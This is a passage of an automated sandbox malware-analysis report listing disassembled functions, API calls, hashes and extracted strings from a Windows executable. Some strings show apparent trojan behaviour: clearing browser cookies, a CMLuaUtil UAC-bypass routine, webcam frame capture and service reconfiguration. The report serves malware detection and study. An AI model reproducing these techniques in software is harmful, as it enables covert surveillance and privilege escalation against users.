                                • Opcode Fuzzy Hash: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
                                • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: D[E$D[E
                                • API String ID: 269201875-3695742444
                                • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                • __alloca_probe_16.LIBCMT ref: 004511B1
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                • __freea.LIBCMT ref: 0045121D
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID: PkGNG
                                • API String ID: 313313983-263838557
                                • Opcode ID: 91877320caf02f46ead72dc2d27e097aa9d58b2df1b48cbe6668f1112c1efda2
                                • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                • Opcode Fuzzy Hash: 91877320caf02f46ead72dc2d27e097aa9d58b2df1b48cbe6668f1112c1efda2
                                • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                • API String ID: 1133728706-4073444585
                                • Opcode ID: 1e05d710c332b0c32bace29fd72cf7e3a184a0c4047cd7709485bc9a7fc4ad42
                                • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                • Opcode Fuzzy Hash: 1e05d710c332b0c32bace29fd72cf7e3a184a0c4047cd7709485bc9a7fc4ad42
                                • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                • Opcode Fuzzy Hash: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                • _free.LIBCMT ref: 00450F48
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00450F53
                                • _free.LIBCMT ref: 00450F5E
                                • _free.LIBCMT ref: 00450FB2
                                • _free.LIBCMT ref: 00450FBD
                                • _free.LIBCMT ref: 00450FC8
                                • _free.LIBCMT ref: 00450FD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                • int.LIBCPMT ref: 00411183
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 004111C3
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID: (mG
                                • API String ID: 2536120697-4059303827
                                • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\1m70ggeepT.exe), ref: 004075D0
                                  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                • CoUninitialize.OLE32 ref: 00407629
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitializeObjectUninitialize_wcslen
                                • String ID: C:\Users\user\Desktop\1m70ggeepT.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                • API String ID: 3851391207-3084214590
                                • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                • GetLastError.KERNEL32 ref: 0040BAE7
                                Strings
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                • UserProfile, xrefs: 0040BAAD
                                • [Chrome Cookies not found], xrefs: 0040BB01
                                • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                • Opcode Fuzzy Hash: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$PkGNG$mscoree.dll
                                • API String ID: 4061214504-213444651
                                • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                Download Yara Rule
                                APIs
                                • __allrem.LIBCMT ref: 0043AC69
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                • __allrem.LIBCMT ref: 0043AC9C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                • __allrem.LIBCMT ref: 0043ACD1
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: H_prologSleep
                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                • API String ID: 3469354165-3054508432
                                • Opcode ID: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                • Opcode Fuzzy Hash: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                • Opcode Fuzzy Hash: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                • String ID:
                                • API String ID: 493672254-0
                                • Opcode ID: 91938c1d555d364b93c99e00d8beeb13e1151d7f412d7edf767a6a0184c3eeef
                                • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                • Opcode Fuzzy Hash: 91938c1d555d364b93c99e00d8beeb13e1151d7f412d7edf767a6a0184c3eeef
                                • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID: PkGNG
                                • API String ID: 1036877536-263838557
                                • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
